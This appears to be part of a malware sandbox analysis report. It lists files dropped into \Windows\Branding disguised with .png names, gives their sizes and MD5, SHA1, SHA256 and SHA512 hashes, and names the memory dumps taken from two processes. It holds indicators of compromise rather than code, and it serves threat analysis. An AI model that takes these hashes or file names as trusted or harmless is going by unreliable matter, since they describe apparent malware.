944b6d8a68ae8bf1981b4388cbf8f510ed0359ef

SHA256
12a64c5a43332827581d129233165f5c77ccdeb21e8ef50edc0b2720ac7a778c

SHA512
1bd5dbfda5eee0e9998b1be2d1f87aa22ddbbf7366cf0e3e4d1d48a8278d7ad872fc006e5cbc3ed113f3a774c5b18db9cb189a6200f28aa6425f3a27a1ad1840

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
271eacd9c9ec8531912e043bc9c58a31

SHA1
c86e20c2a10fd5c5bae4910a73fd62008d41233b

SHA256
177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934

SHA512
87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
1fa9c1e185a51b6ed443dd782b880b0d

SHA1
50145abf336a196183882ef960d285bd77dd3490

SHA256
f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959

SHA512
16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc

Download Submit
memory/844-0-0x000007FEF55F3000-0x000007FEF55F4000-memory.dmp

Filesize
4KB

Download
memory/844-4-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp

Filesize
9.9MB

Download
memory/844-38-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp

Filesize
9.9MB

Download
memory/844-37-0x000007FEF55F3000-0x000007FEF55F4000-memory.dmp

Filesize
4KB

Download
memory/844-3-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp

Filesize
9.9MB

Download
memory/844-2-0x000007FEF55F0000-0x000007FEF5FDC000-memory.dmp

Filesize
9.9MB

Download
memory/844-1-0x00000000414B0000-0x0000000041760000-memory.dmp

Filesize
2.7MB

Download
memory/2804-15-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-33-0x000000001B610000-0x000000001B618000-memory.dmp

Filesize
32KB

Download
memory/2804-19-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-18-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-39-0x000000001D110000-0x000000001D142000-memory.dmp

Filesize
200KB

Download
memory/2804-40-0x000000001D110000-0x000000001D142000-memory.dmp

Filesize
200KB

Download
memory/2804-17-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-51-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-52-0x000007FEED6EE000-0x000007FEED6EF000-memory.dmp

Filesize
4KB

Download
memory/2804-53-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-59-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-60-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-14-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp

Filesize
9.6MB

Download
memory/2804-13-0x00000000026A0000-0x00000000026A8000-memory.dmp

Filesize
32KB

Download
memory/2804-11-0x000007FEED6EE000-0x000007FEED6EF000-memory.dmp

Filesize
4KB

Download
memory/2804-12-0x000000001B210000-0x000000001B4F2000-memory.dmp

Filesize
2.9MB

Download